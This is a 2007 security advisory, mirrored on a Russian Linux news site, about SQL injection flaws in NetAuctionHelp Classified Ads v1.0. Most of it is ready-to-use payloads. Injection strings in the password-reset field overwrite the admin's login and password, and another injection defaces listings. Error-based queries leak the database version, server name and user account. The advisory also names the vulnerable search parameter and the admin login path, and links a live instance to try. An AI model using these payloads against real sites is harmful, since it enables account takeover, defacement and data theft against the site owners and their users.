The OpenNET Project
 
Search (keywords):  SOFT ARTICLES TIPS & TRICKS SECURITY
LINKS NEWS MAN DOCUMENTATION


NetAuctionHelp Classified Ads v1.0 SQL Injection


<< Previous INDEX Search src / Print Next >>
Date: 24 Nov 2007 22:11:33 -0000
From: [email protected]
To: [email protected]
Subject: NetAuctionHelp Classified Ads v1.0 SQL Injection
X-Virus-Scanned: antivirus-gw at tyumen.ru

Aria-Security Team
http://Aria-Security.Net
------------------------------------------
Original Advisory @ http://aria-security.net/forum/showthread.php?p=1111
Try it online @  http://ads.netauctionhelp.com


needed tables:

tblMember.id
tblMember.login
tblMember.pswd

Vulnarable Page: Login.asp
Run this query for Forget Password
-1' UPDATE tblMember Set login= 'admin' where(id='1');--
-1' UPDATE tblMember set pswd= 'hacked' Where(id= '1');--


there it is, admin with the password hacked

------------------------------------------------------------------------------------
these may help the attacker to get more info in the search.asp page

/search.asp?sort=ni&category=&categoryname=&kwsearc h=&nsearch=[SQL Injection]


tblAd.id,tblAd.imagepath,tblAd.aspectratio,tblAd.t itle,tblAd.zip,tblAd.state,tblAd.startdate'


example: -1' update tblAd set title= 'hacked' where(id='1');--
site.com/addetl.asp?id=1 will say HACKED.

1' or 1=convert(int,@@version)--
1' or 1=convert(int,@@servername)--
1' or 1=convert(int,db_name())--
1' or 1=convert(int,user_name())--
1' or 1=convert(int,system_user)--


hint: /auctionAdmin/admLogin.asp ;)


Greetz: AurA
Credits goes to Aria-Security Team
Regards,
The-0utl4w






<< Previous INDEX Search src / Print Next >>



Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2025 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру